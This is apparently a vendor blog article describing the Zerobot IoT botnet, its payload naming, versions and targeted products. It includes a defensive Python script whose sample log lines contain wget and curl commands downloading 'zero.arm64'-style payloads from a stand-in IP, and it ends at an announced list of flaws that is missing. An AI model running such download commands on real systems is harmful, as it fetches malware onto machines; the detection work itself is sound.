Zerobot: New Botnet Campaign Exploits Vulnerabilities
Dozens of IoT Security Flaws Actively Being Used to Launch DDoS Attacks.
Last updated on July 18, 2023
Please note that the term “Zerobot” in this article refers to a specific malware variant, not to zerobot.ai, an organization which offers a verbal chatbot service.
Recently, a Go-based botnet, Zerobot, was seen spreading in the wild. It took advantage of nearly two dozen different security vulnerabilities found in IoT devices and other software. The malware enrolls infected devices in a DDoS botnet, which launches powerful attacks against specified targets.
The campaign allegedly began after November 18, and primarily singles out Windows and Linux operating systems to gain control of vulnerable machines.
In their advisory, the researchers claim the botnet:
…contains several modules, including self-replication, attacks for different protocols, and self-propagation. It also communicates with its command-and-control server using the WebSocket protocol.
Zerobot is a propagation script that’s used to retrieve the malicious payload once it has access to a computer. It determines the host’s microarchitecture and uses that information to fetch the corresponding payload (e.g., “zero.arm64”). The malware targets a wide range of CPU architectures, including i386, amd64, arm, arm64, mips, mips64, mips64le, mipsle, ppc64, ppc64le, riscv64 and s390x.
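For defenders, the per-architecture payload naming described above gives a simple hunting pivot. The following is an added example, not code from the article or the researchers' advisory: it assumes payload files follow the "zero.<arch>" pattern generalised from the article's "zero.arm64" example, and the log layout, host names and addresses are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote

# CPU architectures the article says Zerobot ships payloads for.
ARCHES = {"i386", "amd64", "arm", "arm64", "mips", "mips64", "mips64le",
          "mipsle", "ppc64", "ppc64le", "riscv64", "s390x"}
URL_RE = re.compile(r"https?://[^\s'\"<>|;]+", re.IGNORECASE)

def payload_arch(url):
    """Return the architecture if the URL's file name is zero.<arch>, else None."""
    # Decode percent-escapes and drop query strings before comparing the name.
    name = unquote(urlsplit(url).path).rsplit("/", 1)[-1].lower()
    prefix, sep, arch = name.partition(".")
    if prefix == "zero" and sep and arch in ARCHES:
        return arch
    return None

def scan(lines):
    """Map host -> sorted payload architectures requested in its log lines.

    Assumed (constructed) layout: '<timestamp> <host> <free text with URLs>'.
    """
    hits = defaultdict(set)
    for line in lines:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue  # malformed line, nothing to inspect
        host, rest = parts[1], parts[2]
        for url in URL_RE.findall(rest):
            arch = payload_arch(url)
            if arch:
                hits[host].add(arch)
    return {h: sorted(a) for h, a in hits.items()}

# Constructed sample log lines (documentation-range IPs, not real indicators).
SAMPLE = [
    "2022-12-01T10:00:01Z cam-01 sh -c wget http://203.0.113.5/bins/zero.arm64 -O /tmp/z",
    "2022-12-01T10:00:03Z cam-01 curl -s http://203.0.113.5/bins/zero.mips?x=1",
    "2022-12-01T10:00:05Z nas-02 curl http://203.0.113.5/bins/ZERO%2Earm",
    "2022-12-01T10:01:00Z web-03 wget https://example.com/docs/subzero.arm64",
    "2022-12-01T10:01:02Z web-03 wget https://example.com/zero.arm64.sig",
    "2022-12-01T10:01:09Z web-03 GET https://example.com/zero.html",
]

if __name__ == "__main__":
    for host, arches in scan(SAMPLE).items():
        print(host, arches)
```

A single host requesting several architectures in quick succession, as cam-01 does in the sample, is worth prioritising, since a legitimate client rarely needs binaries for more than one CPU type.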
Two distinct versions of Zerobot have been observed to date:
One used before November 24, which includes basic functions,
The updated version with a self-propagating module that can breach other endpoints by making use of 21 exploits.
The exploits included in the update target flaws in products such as TOTOLINK routers, Zyxel firewalls, F5 BIG-IP, Hikvision cameras, FLIR AX8 thermal imaging cameras, D-Link DNS-320 NAS, and Spring Framework.
The advisory lists the exploited flaws as follows:
Mihaela is a digital content creator for Heimdal® and the proud owner of an old soul and a curious mind. Passionate to learn and discover more about cybersecurity, she will gladly share her latest finds with you.